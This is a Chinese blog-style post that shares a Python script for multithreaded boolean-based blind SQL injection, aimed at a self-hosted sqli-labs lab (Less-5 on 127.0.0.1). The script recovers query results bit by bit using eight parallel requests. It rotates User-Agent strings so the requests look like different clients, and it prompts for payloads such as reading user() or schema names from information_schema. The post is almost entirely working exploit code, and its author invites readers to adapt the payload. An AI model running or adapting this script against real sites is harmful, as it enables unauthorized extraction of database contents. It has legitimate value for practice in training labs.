比二分法更OK的盲注多线程(python脚本)

 废话不多说直接上代码:

import threading
import requests
# Eight User-Agent strings. asc() indexes this list with the bit position
# i (0..7), so it must hold at least eight entries; the rotation makes each
# of the eight per-character requests look like a different client, but the
# identical ascii(substr(...))&mask=mask query shape still stands out in logs.
user_agent = [
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3"
]
class MyThread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value.

    ``threading.Thread`` discards the target's return value; this subclass
    stores it in ``self.res`` so the caller can collect it after ``join()``.
    ``res`` is only assigned inside ``run``, so ``getresult`` raises
    ``AttributeError`` if called before the thread has executed.
    """

    def __init__(self, func, args):
        super().__init__()
        self.func = func
        self.args = args

    def getresult(self):
        """Return the value produced by ``func``; valid once ``run`` has finished."""
        return self.res

    def run(self):
        # Invoked on the worker thread by start(); the result is read by getresult().
        self.res = self.func(*self.args)
def asc(a, i, payload):
    """Test bit ``i`` of the ``a``-th character of the ``payload`` result.

    Sends one boolean-based request against the hard-coded local sqli-labs
    instance. The injected condition masks the character's ASCII value with
    ``2**i`` (``%26`` is the URL-encoded ``&``) and compares it to the mask;
    the response is treated as "true" when it contains the marker text
    ``You are in...........``. Returns ``2**i`` in that case, else ``0``, so
    the caller can sum the eight bit results into one character code.

    ``payload`` is spliced into the query string as-is, without any quoting.
    """
    bit = 1 << i
    mask = str(bit)
    url = (
        "http://127.0.0.1/2/Less-5/?id=1'and ascii(substr(("
        + payload
        + "),"
        + str(a)
        + ",1))%26"
        + mask
        + "="
        + mask
        + "--+"
    )
    # One User-Agent per bit position, taken from the module-level list.
    response = requests.get(url, headers={"User-Agent": user_agent[i]})
    return bit if "You are in..........." in response.text else 0
def main():
    """Recover the query result one character at a time and print it.

    For every character position, eight ``MyThread`` workers each probe one
    bit via ``asc`` and the bit values are summed into the ASCII code. A code
    of 0 (no bit set, i.e. past the end of the result) ends the loop; as in
    the original control flow, that terminating ``chr(0)`` is still appended
    to the output before the loop exits.
    """
    payload = input('请输入payload(比如select user()/user()/SELECT group_concat(SCHEMA_name) from information_schema.SCHEMATA):')
    position = 1
    recovered = ''
    keep_going = True
    while keep_going:
        code = 0
        workers = [MyThread(asc, (position, i, payload)) for i in range(8)]
        for worker in workers:
            worker.start()
        # Join in creation order and accumulate each bit's contribution.
        for worker in workers:
            worker.join()
            code += worker.getresult()
        keep_going = code != 0
        recovered += chr(code)
        position += 1
    print(recovered)
if __name__ == "__main__":
    # Only run the interactive extractor when executed as a script, not on import.
    main()

网站是自己搭建的sqli-labs,自己根据需要修改payload吧。
